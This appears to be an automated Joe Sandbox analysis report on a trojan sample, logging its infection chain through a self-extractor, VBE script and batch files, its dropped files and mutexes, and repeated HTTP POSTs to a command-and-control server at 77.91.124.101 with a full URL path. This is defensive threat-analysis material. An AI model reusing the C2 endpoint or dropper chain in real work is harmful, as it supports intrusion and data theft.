                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1396Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: Joe Sandbox View ASN Name: ECOTEL-ASRU ECOTEL-ASRU
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77.91.124.101
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77.91.1H
                                  Source: BlockrefBrokerperf.exe, 00000005.00000002.2209540037.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: unknown TCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknown HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive

                                  System Summary

                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, s67.cs Long String: Length: 402992
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, s67.cs Long String: Length: 402992
                                  Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: api-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BfMGYDNR.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                  Source: o9jDrpZrgR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: String function: 0089EC50 appears 56 times
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: String function: 0089F5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: String function: 0089EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_00886FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00886FAA
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\eQQkRcVr.logJump to behavior
                                  Source: classification engineClassification label: mal100.troj.evad.winEXE@18/43@0/1
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_00886C74 GetLastError,FormatMessageW,0_2_00886C74
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0089A6C2
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                  Source: o9jDrpZrgR.exeReversingLabs: Detection: 65%
                                  Source: o9jDrpZrgR.exeVirustotal: Detection: 69%
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile read: C:\Users\user\Desktop\o9jDrpZrgR.exeJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\o9jDrpZrgR.exe C:\Users\user\Desktop\o9jDrpZrgR.exe
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exeJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\AppData\Local\Temp\nltb4WKmeRJump to behavior
                                  Source: o9jDrpZrgR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, s67.cs, 8B6.cs, 76n.cs, 7YK.cs, 52Z.cs: Base64 encoded strings
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, s67.cs, 8B6.cs, 76n.cs, 7YK.cs, 52Z.cs: Base64 encoded strings
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeMutant created: \Sessions\1\BaseNamedObjects\Local\24ce2d5742570a51f4be0130d49d0ec60b8bba1c26d1231a555ddb981a05477d
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCommand line argument: sfxname0_2_0089DF1E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCommand line argument: sfxstime0_2_0089DF1E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCommand line argument: STARTDLG0_2_0089DF1E
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2Jump to behavior
                                  Source: o9jDrpZrgR.exeStatic file information: File size 1622827 > 1048576
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: o9jDrpZrgR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: o9jDrpZrgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: o9jDrpZrgR.exe
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: o9jDrpZrgR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 857.cs.Net Code: _736
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, 857.cs.Net Code: _736
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089F640 push ecx; ret 0_2_0089F653
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089EB78 push eax; ret 0_2_0089EB96
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F43CB9 push ebx; retf 5_2_00007FF848F43CBA
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F5739D push ebp; retf 5_2_00007FF848F573A8
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F57BAC push eax; ret 5_2_00007FF848F57BAD
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 5_2_00007FF848F400BD pushad ; iretd 5_2_00007FF848F400C1
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F4739E push ebp; retf 12_2_00007FF848F473A8
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F47BAC push eax; ret 12_2_00007FF848F47BAD
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 12_2_00007FF848F300BD pushad ; iretd 12_2_00007FF848F300C1
